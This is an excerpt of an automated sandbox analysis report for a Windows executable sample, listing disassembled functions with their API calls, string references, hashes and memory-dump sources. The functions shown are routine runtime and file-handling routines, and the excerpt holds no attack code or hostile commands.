Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 867e092ff93f4d828024daefc5c8bb11de08c14af3e2d0b81a5918a793f1f6bc
Instruction ID: 6a1c3f5caa462f55659642206311a99fa1897fd59e292f4c0e26cd212849d9d1
Opcode Fuzzy Hash: 867e092ff93f4d828024daefc5c8bb11de08c14af3e2d0b81a5918a793f1f6bc
Instruction Fuzzy Hash: A4012532544209FBCF129F90EC02DEE7F66EF08765F424154FE282A170CB328A71AB91

Uniqueness

Uniqueness Score: -1.00%

Function 0014AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0014A56F), ref: 0014AF55

Strings

InitializeCriticalSectionEx, xrefs: 0014AF1B, 0014AF25

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: d97319dcbcb7fd27137a5b159d90604d501367c86caa96f0fe4b9eeea420579e
Instruction ID: 01c7464b281020e4c295e8f4cab6c9c21df1322c889b2f38ca1c874865527d0b
Opcode Fuzzy Hash: d97319dcbcb7fd27137a5b159d90604d501367c86caa96f0fe4b9eeea420579e
Instruction Fuzzy Hash: 42F0B431685208FBCF166F50DC02C9DBF61EF14762B414064FC285E2A0DB715E14DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0014ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0014ADEE

Strings

FlsAlloc, xrefs: 0014ADC0, 0014ADCA

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5b8e69b808b172017cdfe5803b41a753cdbbc1963b461646fdff881e5699995e
Instruction ID: e2f279282e04876860ce56f03caf28d1249b7f7beea07ee3ff005ae57cd9634e
Opcode Fuzzy Hash: 5b8e69b808b172017cdfe5803b41a753cdbbc1963b461646fdff881e5699995e
Instruction Fuzzy Hash: F1E05530A80308FBC202ABA4EC0396EBB94DF14732B420098FC209B290CF705E8086E6

Uniqueness

Uniqueness Score: -1.00%

Function 0013EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013EAF9

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Strings

3To, xrefs: 0013EAE7, 0013EAF3

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: 5cdeebb43e511cda7d1082204c7dc7fb4f727f18fdb83ac9d484c4818fc347eb
Instruction ID: 2194229c0d0d7e57f5dc66e21e1a635c7aa4e860f8ba56e90f9a1a7e388e2fd2
Opcode Fuzzy Hash: 5cdeebb43e511cda7d1082204c7dc7fb4f727f18fdb83ac9d484c4818fc347eb
Instruction Fuzzy Hash: 9CB012D669A342FCB10872005E02C37014CC1D0F91730802EF820DC0C1DF800E0A0871

Uniqueness

Uniqueness Score: -1.00%

Function 0014BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0014B7BB: GetOEMCP.KERNEL32(00000000,?,?,0014BA44,?), ref: 0014B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0014BA89,?,00000000), ref: 0014BC64
GetCPInfo.KERNEL32(00000000,0014BA89,?,?,?,0014BA89,?,00000000), ref: 0014BC77

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 766c32d815d2bc237e37d352d7ed9bb5219de20795f8dc0d88357ac35955239a
Instruction ID: edfee04971faca47beb018cd29ca5722a782b790be976edf0d5ef1d6eac6108f
Opcode Fuzzy Hash: 766c32d815d2bc237e37d352d7ed9bb5219de20795f8dc0d88357ac35955239a
Instruction Fuzzy Hash: A9513470D082459FDB288FB5C8D16BABBF4EF51308F2844AED4968B271D735DA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00129A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00129A50,?,?,00000000,?,?,00128CBC,?), ref: 00129BAB
GetLastError.KERNEL32(?,00000000,00128411,-00009570,00000000,000007F3), ref: 00129BB6

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: ee7239063ee76259562c5415d63127f2862929fdbf652abd7ed200d77fdbcd1a
Instruction ID: 88966b4eca72f97b3f398f3f7d2a9c1a8802611fc4292a3c27d5d5d3eb76e14b
Opcode Fuzzy Hash: ee7239063ee76259562c5415d63127f2862929fdbf652abd7ed200d77fdbcd1a
Instruction Fuzzy Hash: 2541CC31A04321CFDB28DF2DF58486AB7E5FFE4320F158A2DE891832A0D770AD548B91

Uniqueness

Uniqueness Score: -1.00%

Function 0014BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 001497E5: GetLastError.KERNEL32(?,00161030,00144674,00161030,?,?,00143F73,00000050,?,00161030,00000200), ref: 001497E9
Part of subcall function 001497E5: _free.LIBCMT ref: 0014981C
Part of subcall function 001497E5: SetLastError.KERNEL32(00000000,?,00161030,00000200), ref: 0014985D
Part of subcall function 001497E5: _abort.LIBCMT ref: 00149863

Part of subcall function 0014BB4E: _abort.LIBCMT ref: 0014BB80
Part of subcall function 0014BB4E: _free.LIBCMT ref: 0014BBB4

Part of subcall function 0014B7BB: GetOEMCP.KERNEL32(00000000,?,?,0014BA44,?), ref: 0014B7E6

_free.LIBCMT ref: 0014BA9F
_free.LIBCMT ref: 0014BAD5

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 370f193fc0ecc6cc28ee737e954eedd867439628f4ce0edb67fa767728008c36
Instruction ID: c4a13d00d2ce23f4df13a48f3a96f43dfadc39392ac01dea1cc2d65711d17734
Opcode Fuzzy Hash: 370f193fc0ecc6cc28ee737e954eedd867439628f4ce0edb67fa767728008c36
Instruction Fuzzy Hash: B331E831908209AFDB14DFA8D481B9D77F5EF50325F314499E9149B2B2EB32DE41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00121E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00121E55

Part of subcall function 00123BBA: __EH_prolog.LIBCMT ref: 00123BBF

_wcslen.LIBCMT ref: 00121EFD

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 11f18e4095dcbde353633de5d52c86d7b9808e787dc2ed455cd2557567c45352
Instruction ID: 6507c2f6f0ea31edfe0f866356e1c49006e3da84de06fdbe8973c49e24ec4959
Opcode Fuzzy Hash: 11f18e4095dcbde353633de5d52c86d7b9808e787dc2ed455cd2557567c45352
Instruction Fuzzy Hash: 87313A72904219AFCF15EF98D945AEEFBF6AF68300F200469F855B7251CB365E24CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00129DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001273BC,?,?,?,00000000), ref: 00129DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00129E70

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: e1ab6e4857c510e879e85dafd414aab12ad9d0ea719a3ebfa0197d5a894ba4bd
Instruction ID: 8f218044cd1b21936b4dbec6fcb863fdf4460671c20d064eeb6a0a6be5c0b2c3
Opcode Fuzzy Hash: e1ab6e4857c510e879e85dafd414aab12ad9d0ea719a3ebfa0197d5a894ba4bd
Instruction Fuzzy Hash: BB21E131248399EFC714DF78D891AABBBE4AF55704F08491CF8C587581D329E92CDB62

Uniqueness

Uniqueness Score: -1.00%

Function 0012966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00129F27,?,?,0012771A), ref: 001296E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00129F27,?,?,0012771A), ref: 00129716

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 817959ba6c1fba7aaf6d8da0b5003b1a8fc9fdf581856a626a1a623021901d9f
Instruction ID: bdd08bb73fddc5c84d1a13c95dd8db9837dffb0bb30039f56710f4338df031f1
Opcode Fuzzy Hash: 817959ba6c1fba7aaf6d8da0b5003b1a8fc9fdf581856a626a1a623021901d9f
Instruction Fuzzy Hash: 812100B1004354AFE3308A69DC89FF7B3DCEB59320F000A18FAD6C65C1C774A8948A31

Uniqueness

Uniqueness Score: -1.00%

Function 00129E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00129EC7
GetLastError.KERNEL32 ref: 00129ED4

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b7934bcf1835e4aeafae88974fb1b183ce7561054c62c344d7fb921ad51ff78a
Instruction ID: 98d249166b0b6a6f36515477b390dab55f5d372efec43e280ae88d3b9270417f
Opcode Fuzzy Hash: b7934bcf1835e4aeafae88974fb1b183ce7561054c62c344d7fb921ad51ff78a
Instruction Fuzzy Hash: 1D11E530600724ABD724D62CEC41BA6B7E9AB44370F514A29E162D26D0D770ED65C760

Uniqueness

Uniqueness Score: -1.00%

Function 00148E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00148E75

Part of subcall function 00148E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014CA2C,00000000,?,00146CBE,?,00000008,?,001491E0,?,?,?), ref: 00148E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00161098,001217CE,?,?,00000007,?,?,?,001213D6,?,00000000), ref: 00148EB1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 0258e7d9dabf4b9f3bc246d619290eb813d6d3fbe079c8bc2a232de6308cdfe5
Instruction ID: d849f79c5ec22145d43b4eb9ae991b5194a16a5fa4e9e5703b759b9db80d636b
Opcode Fuzzy Hash: 0258e7d9dabf4b9f3bc246d619290eb813d6d3fbe079c8bc2a232de6308cdfe5
Instruction Fuzzy Hash: A5F0BB32611215A6DB253B659C05F6F77588FD1B70F254126F818BB1B1DF70DD0081A0

Uniqueness

Uniqueness Score: -1.00%

Function 0013109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 001310AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 001310B2

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: f1d4b3cb470944d1417a49d22c66f9a95a00652b38c31633170909eac73f2ffa
Instruction ID: c52657434b821e38a24b086205b0bf4171833db4dcae2da51f6d9de7ffc22fcc
Opcode Fuzzy Hash: f1d4b3cb470944d1417a49d22c66f9a95a00652b38c31633170909eac73f2ffa
Instruction Fuzzy Hash: E5E09A32B00349F7CF0D8BA49C058ABB2EDEA44245B208179F413EB501FA30EE814AA0

Uniqueness

Uniqueness Score: -1.00%

Function 0012A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0012A325,?,?,?,0012A175,?,00000001,00000000,?,?), ref: 0012A501

Part of subcall function 0012BB03: _wcslen.LIBCMT ref: 0012BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012A325,?,?,?,0012A175,?,00000001,00000000,?,?), ref: 0012A532

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: c69379e324ed8a5ba119ab7eebbad32912def77e1bf8c8ba2a995a9501511fb1
Instruction ID: 9d8ad7ab384cd35354ab85d1bee7663cac7d3b72747cd0f1d3ad56dcd2aa474a
Opcode Fuzzy Hash: c69379e324ed8a5ba119ab7eebbad32912def77e1bf8c8ba2a995a9501511fb1
Instruction Fuzzy Hash: D0F03031240319BBDF025F60EC45FDA376CAF14385F448451B945D61A0DB71DAE4DA50

Uniqueness

Uniqueness Score: -1.00%

Function 0012A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0012977F,?,?,001295CF,?,?,?,?,?,00152641,000000FF), ref: 0012A1F1

Part of subcall function 0012BB03: _wcslen.LIBCMT ref: 0012BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0012977F,?,?,001295CF,?,?,?,?,?,00152641), ref: 0012A21F

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 1db9d71692f2103c6158108a09d3d4ab8d0caef1febbdd0095c8d7766b214c8c
Instruction ID: 8ac4610a162919495cfafdec1368eb723644b8303d645f4609e1ea7496aba89b
Opcode Fuzzy Hash: 1db9d71692f2103c6158108a09d3d4ab8d0caef1febbdd0095c8d7766b214c8c
Instruction Fuzzy Hash: 6BE09231140319ABEB015F60EC45FD9379CAF183C2F484021B944D6090EB61DED4DA50

Uniqueness

Uniqueness Score: -1.00%

Function 0013AC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00152641,000000FF), ref: 0013ACB0
OleUninitialize.OLE32(?,?,?,?,00152641,000000FF), ref: 0013ACB5

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 34e460d92ee366ba27de01602a789979baef409921c3e4c9ecdcd24bba755512
Instruction ID: 2e58df074a6503a60bb5c4a125c952e19849bd2aeae2fbf7ff8c16b45a82ade3
Opcode Fuzzy Hash: 34e460d92ee366ba27de01602a789979baef409921c3e4c9ecdcd24bba755512
Instruction Fuzzy Hash: 89E06572544650EFC7019B59DC46B45FBA9FB48F20F044365F416D3BA0CB746940CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0012A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0012A23A,?,0012755C,?,?,?,?), ref: 0012A254

Part of subcall function 0012BB03: _wcslen.LIBCMT ref: 0012BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0012A23A,?,0012755C,?,?,?,?), ref: 0012A280

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: c8d29eaab0d2c2f2d5bc04a7c38a97657876bb53c8a6077b8b41040432e5348e
Instruction ID: 165508dc732d9ebd0206035762c5c9e6817202ed775fbd3e092a02db572d1bb0
Opcode Fuzzy Hash: c8d29eaab0d2c2f2d5bc04a7c38a97657876bb53c8a6077b8b41040432e5348e
Instruction Fuzzy Hash: 3AE09231500224DBCB10AB64DC05BD97798AB183E2F044261FD54E71D0D770DE94CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0013DEEC

Part of subcall function 00124092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001240A5

SetDlgItemTextW.USER32(00000065,?), ref: 0013DF03

Part of subcall function 0013B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013B579
Part of subcall function 0013B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013B58A
Part of subcall function 0013B568: IsDialogMessageW.USER32(00010440,?), ref: 0013B59E
Part of subcall function 0013B568: TranslateMessage.USER32(?), ref: 0013B5AC
